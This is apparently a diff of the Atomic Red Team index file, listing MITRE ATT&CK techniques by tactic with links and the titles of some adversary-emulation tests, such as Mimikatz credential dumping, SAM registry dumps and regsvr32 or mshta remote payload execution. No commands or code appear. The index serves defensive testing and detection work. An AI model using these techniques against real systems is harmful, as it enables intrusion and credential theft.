- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1088?T1088.md)
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1038?T1038.md)
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1157?T1157.md)
- [T1068 Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1068?T1068.md)
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1181?T1181.md)
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1044?T1044.md)
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
- [T1134 Access Token Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1015 Accessibility Features](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
- [T1182 AppCert DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1103 AppInit DLLs](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1138 Application Shimming](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1088 Bypass User Account Control](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1038 DLL Search Order Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1157 Dylib Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1068 Exploitation for Privilege Escalation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1181 Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1044 File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1179 Hooking](./T1179/T1179.md)
|
||||
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1183?T1183.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1160?T1160.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1050?T1050.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1034?T1034.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1150?T1150.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1013?T1013.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1055?T1055.md)
|
||||
- [T1178 SID-History Injection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1178?T1178.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1058?T1058.md)
|
||||
- [T1166 Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1166?T1166.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1165?T1165.md)
|
||||
- [T1169 Sudo](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1169?T1169.md)
|
||||
- [T1206 Sudo Caching](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1206?T1206.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1078?T1078.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1100?T1100.md)
|
||||
- [T1183 Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1160 Launch Daemon](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1050 New Service](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1034 Path Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1150 Plist Modification](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1013 Port Monitors](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1055 Process Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1178 SID-History Injection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1058 Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1166 Setuid and Setgid](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1165 Startup Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1169 Sudo](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1206 Sudo Caching](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1078 Valid Accounts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1100 Web Shell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# discovery
|
||||
- [T1087 Account Discovery](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1087/T1087.md)
|
||||
- [T1087 Account Discovery](./T1087/T1087.md)
|
||||
- Atomic Test #1: List all accounts
|
||||
- Atomic Test #2: View sudoers access
|
||||
- Atomic Test #3: View accounts with UID 0
|
||||
- Atomic Test #4: List opened files by user
|
||||
- Atomic Test #5: Show if a user account has ever logger in remotely
|
||||
- [T1010 Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1010?T1010.md)
|
||||
- [T1217 Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1217?T1217.md)
|
||||
- [T1083 File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1083?T1083.md)
|
||||
- [T1046 Network Service Scanning](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1046/T1046.md)
|
||||
- [T1010 Application Window Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1217 Browser Bookmark Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1083 File and Directory Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1046 Network Service Scanning](./T1046/T1046.md)
|
||||
- Atomic Test #1: Scan a bunch of ports to see if they are open
|
||||
- [T1135 Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1135?T1135.md)
|
||||
- [T1201 Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1201?T1201.md)
|
||||
- [T1120 Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1120?T1120.md)
|
||||
- [T1069 Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1069?T1069.md)
|
||||
- [T1057 Process Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1057?T1057.md)
|
||||
- [T1012 Query Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1012?T1012.md)
|
||||
- [T1018 Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1018?T1018.md)
|
||||
- [T1063 Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1063?T1063.md)
|
||||
- [T1082 System Information Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1082?T1082.md)
|
||||
- [T1016 System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1016?T1016.md)
|
||||
- [T1049 System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1049?T1049.md)
|
||||
- [T1033 System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1033?T1033.md)
|
||||
- [T1007 System Service Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1007?T1007.md)
|
||||
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1124?T1124.md)
|
||||
- [T1135 Network Share Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1201 Password Policy Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1120 Peripheral Device Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1069 Permission Groups Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1057 Process Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1012 Query Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1018 Remote System Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1063 Security Software Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1082 System Information Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1016 System Network Configuration Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1049 System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1033 System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1007 System Service Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1124 System Time Discovery](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# credential-access
|
||||
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1098?T1098.md)
|
||||
- [T1139 Bash History](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1139/T1139.md)
|
||||
- [T1098 Account Manipulation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1139 Bash History](./T1139/T1139.md)
|
||||
- Atomic Test #1: xxxx
|
||||
- [T1110 Brute Force](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1110/T1110.md)
|
||||
- [T1110 Brute Force](./T1110/T1110.md)
|
||||
- Atomic Test #1: Brute Force Credentials
|
||||
- [T1003 Credential Dumping](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1003/T1003.md)
|
||||
- [T1003 Credential Dumping](./T1003/T1003.md)
|
||||
- Atomic Test #1: Powershell Mimikatz
|
||||
- Atomic Test #2: Gsecdump
|
||||
- Atomic Test #3: Windows Credential Editor
|
||||
- Atomic Test #4: Registry dump of SAM, creds, and secrets
|
||||
- [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1081?T1081.md)
|
||||
- [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1214?T1214.md)
|
||||
- [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1212?T1212.md)
|
||||
- [T1187 Forced Authentication](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1187?T1187.md)
|
||||
- [T1179 Hooking](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179/T1179.md)
|
||||
- [T1081 Credentials in Files](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1214 Credentials in Registry](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1212 Exploitation for Credential Access](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1187 Forced Authentication](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1179 Hooking](./T1179/T1179.md)
|
||||
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1056?T1056.md)
|
||||
- [T1141 Input Prompt](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1141?T1141.md)
|
||||
- [T1208 Kerberoasting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1208?T1208.md)
|
||||
- [T1142 Keychain](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1142?T1142.md)
|
||||
- [T1171 LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1171?T1171.md)
|
||||
- [T1040 Network Sniffing](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1040?T1040.md)
|
||||
- [T1174 Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1174?T1174.md)
|
||||
- [T1145 Private Keys](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1145?T1145.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
|
||||
- [T1167 Securityd Memory](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1167?T1167.md)
|
||||
- [T1111 Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1111?T1111.md)
|
||||
- [T1056 Input Capture](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1141 Input Prompt](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1208 Kerberoasting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1142 Keychain](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1171 LLMNR/NBT-NS Poisoning](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1040 Network Sniffing](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1174 Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1145 Private Keys](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1167 Securityd Memory](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1111 Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# execution
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1191?T1191.md)
|
||||
- [T1059 Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1059?T1059.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1196?T1196.md)
|
||||
- [T1173 Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1173?T1173.md)
|
||||
- [T1106 Execution through API](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1106?T1106.md)
|
||||
- [T1129 Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1129?T1129.md)
|
||||
- [T1203 Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1203?T1203.md)
|
||||
- [T1061 Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1061?T1061.md)
|
||||
- [T1118 InstallUtil](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118/T1118.md)
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1191 CMSTP](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1059 Command-Line Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1196 Control Panel Items](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1173 Dynamic Data Exchange](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1106 Execution through API](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1129 Execution through Module Load](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1203 Exploitation for Client Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1061 Graphical User Interface](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1118 InstallUtil](./T1118/T1118.md)
|
||||
- Atomic Test #1: InstallUtil uninstall method call
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1177?T1177.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1152?T1152.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1168?T1168.md)
|
||||
- [T1170 Mshta](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1170/T1170.md)
|
||||
- [T1177 LSASS Driver](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1152 Launchctl](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1168 Local Job Scheduling](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1170 Mshta](./T1170/T1170.md)
|
||||
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
|
||||
- [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1086?T1086.md)
|
||||
- [T1121 Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1121/T1121.md)
|
||||
- [T1086 PowerShell](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
|
||||
- Atomic Test #1: Regasm Uninstall Method Call Test
|
||||
- Atomic Test #2: Regsvs Uninstall Method Call Test
|
||||
- [T1117 Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1117/T1117.md)
|
||||
- [T1117 Regsvr32](./T1117/T1117.md)
|
||||
- Atomic Test #1: Regsvr32 local COM scriptlet execution
|
||||
- Atomic Test #2: Regsvr32 remote COM scriptlet execution
|
||||
- Atomic Test #3: Regsvr32 local DLL execution
|
||||
- [T1085 Rundll32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1085/T1085.md)
|
||||
- [T1085 Rundll32](./T1085/T1085.md)
|
||||
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1053?T1053.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1064?T1064.md)
|
||||
- [T1035 Service Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1035?T1035.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1218?T1218.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1216?T1216.md)
|
||||
- [T1153 Source](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1153?T1153.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1151?T1151.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1154?T1154.md)
|
||||
- [T1127 Trusted Developer Utilities](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1127/T1127.md)
|
||||
- [T1053 Scheduled Task](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1064 Scripting](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1035 Service Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1218 Signed Binary Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1216 Signed Script Proxy Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1153 Source](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1151 Space after Filename](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1154 Trap](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1127 Trusted Developer Utilities](./T1127/T1127.md)
|
||||
- Atomic Test #1: MSBuild Bypass Using Inline Tasks
|
||||
- [T1204 User Execution](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1204?T1204.md)
|
||||
- [T1047 Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1047?T1047.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md)
|
||||
- [T1204 User Execution](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1047 Windows Management Instrumentation](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# lateral-movement
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1155?T1155.md)
|
||||
- [T1017 Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1017?T1017.md)
|
||||
- [T1175 Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1175?T1175.md)
|
||||
- [T1210 Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1210?T1210.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1037?T1037.md)
|
||||
- [T1075 Pass the Hash](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1075?T1075.md)
|
||||
- [T1097 Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1097?T1097.md)
|
||||
- [T1076 Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1076?T1076.md)
|
||||
- [T1105 Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1105/T1105.md)
|
||||
- [T1155 AppleScript](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1017 Application Deployment Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1175 Distributed Component Object Model](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1210 Exploitation of Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1037 Logon Scripts](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1075 Pass the Hash](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1097 Pass the Ticket](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1076 Remote Desktop Protocol](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1105 Remote File Copy](./T1105/T1105.md)
|
||||
- Atomic Test #1: xxxx
|
||||
- [T1021 Remote Services](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1021?T1021.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1091?T1091.md)
|
||||
- [T1184 SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1184?T1184.md)
|
||||
- [T1051 Shared Webroot](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1051?T1051.md)
|
||||
- [T1080 Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1080?T1080.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1072?T1072.md)
|
||||
- [T1077 Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1077?T1077.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1028?T1028.md)
|
||||
- [T1021 Remote Services](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1091 Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1184 SSH Hijacking](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1051 Shared Webroot](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1080 Taint Shared Content](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1072 Third-party Software](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1077 Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1028 Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
|
||||
# collection
|
||||
- [T1123 Audio Capture](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1123/T1123.md)
|
||||
- [T1123 Audio Capture](./T1123/T1123.md)
|
||||
- Atomic Test #1: SourceRecorder via Windows command prompt
|
||||
- Atomic Test #2: PowerShell Cmdlet via Windows command prompt
|
||||
- [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1119?T1119.md)
|
||||
- [T1115 Clipboard Data](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1115/T1115.md)
|
||||
- [T1119 Automated Collection](https://github.com/redcanaryco/atomic-red-team/blob/uppercase-everything/CONTRIBUTIONS.md)
|
||||
- [T1115 Clipboard Data](./T1115/T1115.md)
|
||||
- Atomic Test #1: Utilize Clipboard to store or execute commands from
|
||||
- Atomic Test #2: PowerShell
|
||||
- [T1074 Data Staged](https://github.com/redcanaryco/atomic-red-team/new/master/atomics/T1074?T1074.md)
|
||||
